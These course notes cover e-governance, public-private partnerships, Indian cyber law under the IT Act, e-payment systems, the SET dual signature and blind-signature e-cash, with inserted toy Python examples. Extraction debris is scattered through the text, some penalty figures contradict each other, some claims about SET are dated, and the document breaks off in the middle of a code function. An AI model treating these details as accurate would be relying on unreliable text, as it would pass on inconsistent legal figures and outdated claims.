Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, public key security with Secure Sockets Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community – providers of goods and services – to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

bull Agreement between Government and the Private Sector for the Provision of a Public

Good or Service by the Latter

bull Generally but not always involving

ndash Long Term Contracts

ndash User Charges andor Payments flowing between the Parties

ndash Shared Investments but Mainly Private

PREPARED BY ARUN PRATAP SINGH 46

46

ndash Risk Sharing by the Parties

bull Must be a Partnership

A public-private partnership exists when public sector agencies (federal state or local) join with

private sector entities (companies foundations academic institutions or citizens) and enter into a

business relationship to attain a commonly shared goal that also achieves objectives of the

individual partners

Why do them

bull Fiscal Head Room

bull As a Way of Financing the Project

bull Separate Policy amp Regulation from Operations

PREPARED BY ARUN PRATAP SINGH 47

47

bull Make the Good or Service Available

bull Pay for Performance and Output

bull Introduce Competition ndash For and In the Market

The Need to Set the Right Priorities – Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:
• Shared goals
• Shared resources (time, money, expertise, people)
• Shared risks
• Shared benefits

Benefits:
• Expedited project completion
• Project cost savings
• Improved quality
• Use of private resources
• Access to new sources of private capital

Two Major Steps:
• Crafting the Partnership
• Implementing the Partnership

Project Management – Six Distinct Phases

1. Genesis
• What's the need?
• What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit.
• Is there a need for a Public/Private Partnership?

2. Preliminary Project Definition
• Feasibility: is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
• Market research
• Economic/financial analysis
• Program, budget and schedule
• Risk analysis

3. Plan and Test
• Final project definition: what is the best way to complete the project?
• Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
• Master schedule/budget
• Political climate
• Any potential "fatal flaws" that could derail the project?

4. Procurement and Contracting
• How do you choose and contract with the best-value private partner?
• What's the best delivery method? Design-Bid-Build, Design-Build or Finance-Design-Build
• What do current statutes allow?
• Procurement approach: sole source, RFP, low bid
• Risk allocation between public and private partners
• Structuring of contract/risks and rewards

5. Implement
• Environmental
• Design
• Permitting
• Construction
• Commissioning and administration

6. Operate
• Startup
• Monitoring
• Assessment
• Enhancement
• Contract modifications
• Contract renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure; a repository of electronic information on government laws and policies, including links to archived information and downloadable forms; and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of a country's readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:
• understanding an organization's information security requirements and the need to establish policy and objectives for information security;
• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
• monitoring and reviewing the performance and effectiveness of the ISMS, with continual improvement based on objective measurement.

Data security requires a set of security requirements:
• Authentication: the capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.
• Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.
• Confidentiality: the capability to prevent unauthorized access to information.
• Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.
• Traceability: the capability to chronologically interrelate any transaction to the person or system that performed the action, in a way that is verifiable.
• Non-repudiation: the capability to prevent the person or system intervening in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are:
• Protecting premises, equipment and systems software, including input-output units.
• Protecting software applications used to process personal data.
• Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks.
• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.
• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and by whom, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Despite this, trusted security and privacy measures constitute a crucial success factor for e-Government that has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques like packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:
• Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis.
• Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness.
• Continually improve its control environment.
• Effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality or social order, or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms and industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking: Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting: Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing: Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking: Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing: Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:
• 121 million Internet users
• 65 million active Internet users, up by 28% from 51 million in 2010
• 50 million users shop online on e-commerce and online shopping sites
• 46+ million social network users
• 346 million mobile users had subscribed to data packages


CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:
• Secures access
• Downloads, copies or extracts any data, computer database or any information
• Introduces or causes to be introduced any virus or contaminant
• Disrupts or causes disruption
• Denies or causes denial of access to any person
• Provides any assistance to any person to facilitate access
• Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network
shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

• Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.
• Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years or with fine which may extend to five lakh rupees or with both." [S66]

S 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:
• any information that is grossly offensive or has menacing character; or
• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,
shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits, or causes to be published or transmitted, in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000, or the IT Act) is an Act of the Indian Parliament (No 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:
1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offenses and contraventions
4. Justice dispensation systems for cybercrimes

Offences –

Section | Offence | Punishment
65 | Tampering with computer source documents - Intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years, or/and with fine up to 2 lakh rupees
66 | Hacking | Imprisonment up to three years, or/and with fine up to 5 lakh rupees
66-A | Sending offensive message through electronic means - Sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers, because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, the defence of India, the security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for the investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


Smart Card Applications –
• Ticketless travel: the Seoul bus system (4M cards, 1B transactions since 1996); planned for the SF Bay Area system
• Authentication / ID
• Medical records
• E-cash
• Store loyalty programs
• Personal profiles
• Government licenses
• Mall parking

Credit cards
• It is a plastic card having a magnetic number and code on it.
• It has some fixed amount to spend.
• The customer has to repay the spent amount after some time.


Processing a credit card payment –

Risks in using credit cards –
• Operational risk
• Credit risk
• Legal risk

Secure Electronic Transaction (SET) Protocol
• Jointly designed by MasterCard and Visa with the backing of Microsoft, Netscape, IBM, GTE, SAIC and others.
• Designed to provide security for card payments as they travel on the Internet.
• Contrasted with the Secure Socket Layers (SSL) protocol, SET validates consumers and merchants in addition to providing secure transmission.

SET specification
• Uses public key cryptography and digital certificates for validating both consumers and merchants.
• Provides privacy, data integrity, user and merchant authentication, and consumer nonrepudiation.

The SET Protocol

What Is a Payment Gateway?

A payment gateway is an e-commerce application service provider service that authorizes payments for e-businesses, online shopping, etc. A payment gateway protects credit card details by encrypting sensitive information, such as credit card numbers, to ensure that information passes securely between the customer and the merchant, and also between the merchant and the payment processor.

How It Works

Payments in India – Going the e-way

e-PAYMENT SYSTEM IN INDIA
• Ever-increasing technology changes
• Growing Internet access and mobile subscriber base
• Rising consumer confidence
• Convenient delivery/payment models
• India has been one of the fastest growing countries for payment cards in the Asia-Pacific region
• India currently has approximately 130 million cards (both debit and credit) in circulation

GROWTH IN e-PAYMENT SYSTEM

REGULATION –
The Reserve Bank of India (RBI) has been supportive in the development of electronic payments. In this direction, the "Payments and Settlement System Act" was enacted. Apart from being supportive, the RBI has also initiated various programs to encourage e-payments.

CHANNELS OF PAYMENT –
Indian banks have put various channels of electronic payments in place to encourage customers to adopt the electronic mode. Channels like the Internet, mobile, ATMs and drop boxes are some of the most frequently used channels, apart from bank branches.

MARKET MAPPING –
The e-payments processing market has two major players, namely Tech Process and Bill Desk, which is a pure-play electronic transaction processing company.

The Indian Payment System Is Transforming From Paper Mode To Electronic Mode. Two main reasons for such a shift are:
1. The regulator has mandated routing all high-value transactions electronically to minimize the movement of money and risk.
2. At the retail end, customers are realizing the efficiency of electronic payments.

SHIFTS IN THE PAYMENT SYSTEM

TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT
• Electronic Clearing Service (Credit and Debit)
• National Electronic Fund Transfer (NEFT)

THE RULING PLASTIC MONEY
• Credit cards
• Debit cards
• ATM cards

PayPal

PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. It is subject to the US economic sanction list and other rules and interventions required by US laws or government. PayPal is an acquirer, performing payment processing for online vendors, auction sites and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States, at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Scottsdale, Charlotte and Austin in the United States; Chennai in India; Dublin in Ireland; Kleinmachnow in Germany; and Tel Aviv in Israel. From July 2007, PayPal has operated across the European Union as a Luxembourg-based bank.

Google Wallet

Google Wallet was launched in 2011, serving a similar function as PayPal to facilitate payments and transfer money online. It also features highly robust security and additional features, such as the ability to send payments as attachments via email.


CHARACTERISTICS OF PAYMENT SYSTEM
• There is no paper involved, so electronic payments can be effected directly from home or office.
• Fast, efficient, safe, secure and generally less costly than paper-based alternatives, e.g. cheques.
• Electronic payments are fully traceable.
• In Ireland, the clearing time for standard electronic payments is next-day value for interbank transfers, subject to the payment instruction being received ahead of 'shut-off' times, which can vary from bank to bank. Payment instructions received after the 'shut-off' time will be processed one working day later.
• Most banks offer same-day value for payments made to other accounts held in that same bank.
• Many banks offer same-day money transfer inter-bank services for large value payments.
• Unlike cheques, electronic payments don't 'bounce' – payments will not be effected unless the funds are available in the first place.


Features of Payment Methods
• Anonymity: whether the payment method is anonymous
• Security: whether the payment method is secure
• Overhead cost: the overhead cost of processing a payment
• Transferability: whether a payment can be carried out without the involvement of a third party
• Divisibility: whether a payment can be divided into arbitrarily small payments whose sum is equal to the original payment
• Acceptability: whether the payment method is supported globally

4C PAYMENT METHODS

To make the e-commerce system functional, we also need to incorporate payment functions into the system. In the physical world there are 4 types of payment methods:
• Cash
• Credit card
• Check
• Credit/debit (fund transfer)

• A payment method should be:
  – Very secure
  – Low in overhead cost
  – Transferable
  – Acceptable anywhere
  – Divisible
  – Anonymous

Comparison of the 4C payment methods


SET PROTOCOL FOR CREDIT CARD PAYMENT

• The credit card is one of the most commonly used payment methods in e-commerce, in particular B2C e-commerce.
• Before the introduction of the SET protocol, secure credit card payment was usually carried out over an SSL connection.

Advantage of SSL
• It ensures the secure transmission of credit card information over the internet.

Disadvantage of SSL
• It is not a complete credit card payment method.
• For example, it cannot support on-line credit card authorization.

SET is specially developed to provide secure credit card payment over the internet. It is now widely supported by major credit card companies, including Visa and MasterCard.


• SET aims at satisfying the following security requirements in the context of credit card payment:
  – Confidentiality - Sensitive messages are encrypted so that they are kept confidential.
  – Integrity - Nearly all messages are digitally signed to ensure content integrity.
  – Authentication - Authentication is performed through a public key infrastructure.

SET network architecture
• Merchant: a seller which is connected to an acquirer.
• Cardholder: a registered holder of the credit card who is a buyer.
• Issuer: the bank that issues the credit card to a cardholder.
• Acquirer: the bank that serves as an "agent" to link a merchant to multiple issuers.
• A merchant can process various credit cards through a single acquirer.
• Payment Gateway: this is typically connected to the acquirer.
  – The payment gateway is situated between the SET system and the financial network of the current credit card system for processing the credit card payment.

SET Digital Certificate System


Dual signature generation and verification –

• In the physical credit card system:
  – the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential;
  – data integrity can basically be ensured by using printed receipts;
  – cardholder authentication relies on simple signature checking only.
• In an electronic credit card system:
  – the Order Information (OI) and PI can be digitally signed to ensure data integrity;
  – the sensitive credit card information may still be disclosed to other people.
• SET introduces a novel method called the dual signature (DS) to ensure data integrity while protecting the sensitive information.


How the merchant and the payment gateway verify the DS

- The merchant is provided with OI, H[PI] and DS (never the PI itself).
- The dual signature is verified as follows:

Step 1: The merchant computes H[OI] from the received OI and then forms

  H[ H[PI] || H[OI] ]

Step 2: He recovers the digest the cardholder signed by applying the cardholder's public signature key to DS (RSA signature verification):

  D_RSA[ DS | key_public_sign,cardholder ]

where key_public_sign,cardholder is the public signature key of the cardholder, taken from the cardholder's certificate.

Step 3: Finally he compares the two values, H[H[PI] || H[OI]] and D_RSA[DS | key_public_sign,cardholder]. They are equal only if neither OI, H[PI] nor DS was changed in transit; otherwise the order is rejected as invalid.

The payment gateway is provided with PI, H[OI] and DS and runs the mirror-image check: it computes H[PI] itself, combines it with the received H[OI], and compares the result with the digest recovered from DS. It thus verifies that the payment belongs to this order without ever seeing what was ordered.

By using the dual signature method each cardholder links OI and PI while releasing only the necessary information to each party. If either the OI or the PI is changed, the dual signature is no longer valid, so neither the merchant nor the gateway can substitute a different order or payment for the one the cardholder signed.
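The generation and both verifications described above, as an added worked example that is not code from the original notes. Toy textbook RSA on two fixed Mersenne primes, without padding, stands in for the cardholder's SET signature key (real SET used padded RSA with certificate chains and SHA-1); the order and payment strings are constructed, and the functions `dual_signature`, `merchant_verify` and `gateway_verify` are this example's own names.

```python
"""SET dual signature: DS = Sign( H[ H[PI] || H[OI] ] ), with the merchant's and
the payment gateway's verification. Added example; toy RSA, not production code."""
import hashlib

# --- assumed toy key material (cardholder's signature key pair) ---
P = 2**127 - 1                                # prime
Q = 2**521 - 1                                # prime
N = P * Q                                     # ~648-bit modulus
E = 65537                                     # public exponent
D = pow(E, -1, (P - 1) * (Q - 1))             # private signature key
SIG_LEN = (N.bit_length() + 7) // 8

def H(data: bytes) -> bytes:
    """Hash H[] used in the dual signature (SHA-256 here, SHA-1 in SET)."""
    return hashlib.sha256(data).digest()

def dual_signature(oi: bytes, pi: bytes) -> bytes:
    """Cardholder: DS = Sign( H[ H[PI] || H[OI] ] )."""
    digest = H(H(pi) + H(oi))
    return pow(int.from_bytes(digest, "big"), D, N).to_bytes(SIG_LEN, "big")

def recover_digest(ds: bytes):
    """D_RSA[DS | key_public_sign,cardholder]: the digest the cardholder signed,
    or None when DS is not a valid signature under that key."""
    m = pow(int.from_bytes(ds, "big"), E, N)
    return m.to_bytes(32, "big") if m.bit_length() <= 256 else None

def merchant_verify(oi: bytes, h_pi: bytes, ds: bytes) -> bool:
    """Merchant holds OI, H[PI], DS (never PI): steps 1 to 3 of the text."""
    return H(h_pi + H(oi)) == recover_digest(ds)

def gateway_verify(pi: bytes, h_oi: bytes, ds: bytes) -> bool:
    """Payment gateway holds PI, H[OI], DS (never OI): the mirror-image check."""
    return H(H(pi) + h_oi) == recover_digest(ds)

def demo():
    """Constructed OI/PI; returns (merchant ok, gateway ok, tampered OI, tampered DS)."""
    oi = b"order#1001: 2 x widget, total 20.00 USD"             # constructed
    pi = b"card 4111111111111111 exp 12/29 pay 20.00 USD"       # constructed test PAN
    ds = dual_signature(oi, pi)
    bad_ds = bytes([ds[0] ^ 0x01]) + ds[1:]                     # one bit flipped
    return (merchant_verify(oi, H(pi), ds),
            gateway_verify(pi, H(oi), ds),
            merchant_verify(b"order#1001: 200 x widget", H(pi), ds),
            gateway_verify(pi, H(oi), bad_ds))

if __name__ == "__main__":
    print(demo())   # (True, True, False, False)
```

Note that the merchant's input never includes the PI and the gateway's never includes the OI; each side only needs the other part's hash, which is exactly what the dual signature binds.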

DIGITAL ENVELOPE -

In SET the signed PI travels to the payment gateway inside a digital envelope: the PI is encrypted with a fresh random symmetric key, and that key is encrypted under the payment gateway's public key-exchange key, so the merchant can forward the envelope but cannot open it.


SET PROTOCOL -

The SET protocol has four phases: initiation, purchase, authorization and capture.

1. Initiation: the cardholder sends a purchase initiation request to the merchant, and the merchant returns a response message to the cardholder.
2. Purchase: the cardholder sends the purchase order (OI) together with the payment instruction (PI), linked by the dual signature, to the merchant.
3. Authorization: the merchant forwards the PI to the payment gateway, which obtains authorization from the issuer through the existing card network.
4. Capture: finally the merchant requests that the authorized amount be transferred to its account.

E-CASH

Electronic money is paperless cash. The value is either stored on a card itself or in an account associated with the card. The most common examples are transit cards, meal plans and PayPal; "e-cash" is also used loosely for any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security requirements for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

- Issuers: banks or non-bank institutions that issue e-cash.
- Customers: the users who spend e-cash.
- Merchants or traders: the vendors who receive e-cash.
- Regulators: the related authorities or state tax agencies.

For an e-cash transaction to occur we need to go through at least three stages:

- Account setup: customers obtain e-cash accounts from an issuer. Merchants who want to accept e-cash also need accounts with the various e-cash issuers. Issuers typically handle the accounting for both customers and merchants.
- Purchase: customers buy goods or services and hand the merchant tokens representing the equivalent amount of e-cash. Purchase information is normally encrypted in transit.
- Authentication: the merchant contacts the e-cash issuer with the tokens and the amount involved; the issuer checks that the tokens are genuine and have not already been spent, then approves the amount.

E-cash payment system -

E-cash is one of the main methods for secure online payment for services accessed online. The following model shows how an e-cash payment system works.


This is a simple model of an e-cash payment system; it gives an idea of how the system works, and the phases are explained below.

The customer approaches the issuer's (bank's) site to access his account. The issuer returns money in the form of tokens, generally in fixed denominations (tens and hundreds) or as specified by the customer.

In the second phase the customer hands those tokens to the merchant to acquire services, thereby authorising the payment to the trader.


In the third phase the trader presents the tokens to the token issuer (the customer's bank). After authenticating the tokens, the issuing bank converts them into electronic funds and transfers the amount into the trader's account.

Finally, having received payment for the respective services, the trader provides the requisite service or product and notifies the customer that the payment has been approved and credited to the trader's account.

E-cash is thus a system that allows a person to pay for goods or services by transmitting a number (the token) from one computer to another. Like the serial numbers on real currency notes, the e-cash numbers are unique. Each token is issued by a bank and represents a specified sum of real money.


It is anonymous and reusable

Electronic Cash Security

- Cryptographic techniques (blind signatures at withdrawal, plus the issuer's record of spent serial numbers at deposit) prevent double spending.
- Anonymity is preserved unless double spending is attempted.
- Serial numbers can allow tracing to prevent money laundering.
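The withdraw / spend / deposit cycle with a blind signature and a spent-serial check, as an added example that is not code from the original notes. It shows the online form of double-spend detection (the issuer rejects a serial it has already seen) and why the issuer cannot link a deposited coin to the withdrawal that produced it; the offline variant in which a double spender's identity is revealed is not shown. Toy textbook RSA on fixed Mersenne primes stands in for the issuer's signing key, and the serial numbers, the fixed denomination and the `Issuer` class are this example's own assumptions.

```python
"""Chaum-style anonymous e-cash: blind RSA signature at withdrawal, signature and
serial-number check at deposit. Added example; toy RSA, not production code."""
import hashlib
import secrets

# --- assumed issuer key (toy); one key per denomination in practice ---
P, Q = 2**127 - 1, 2**521 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))            # issuer's private signing key
DENOMINATION = 10                            # every token under this key is worth 10 units

def h(serial: bytes) -> int:
    """The message actually signed: hash of the coin's unique serial number."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big")

# ---- withdrawal: the issuer signs a coin it cannot read ----
def customer_blind(serial: bytes):
    """Customer hides h(serial) behind a random blinding factor r: m * r^E mod N."""
    r = secrets.randbelow(N - 2) + 2
    return (h(serial) * pow(r, E, N)) % N, r

def issuer_sign_blind(blinded: int) -> int:
    """Issuer signs the blinded value (and debits the customer's account)."""
    return pow(blinded, D, N)

def customer_unblind(blind_sig: int, r: int) -> int:
    """(m r^E)^D = m^D r; removing r leaves a plain issuer signature on m."""
    return (blind_sig * pow(r, -1, N)) % N

# ---- deposit: the merchant redeems; the issuer checks signature and serial ----
class Issuer:
    def __init__(self):
        self.spent = set()                   # serial numbers already redeemed

    def deposit(self, serial: bytes, sig: int) -> str:
        if pow(sig, E, N) != h(serial):
            return "rejected: forged token"
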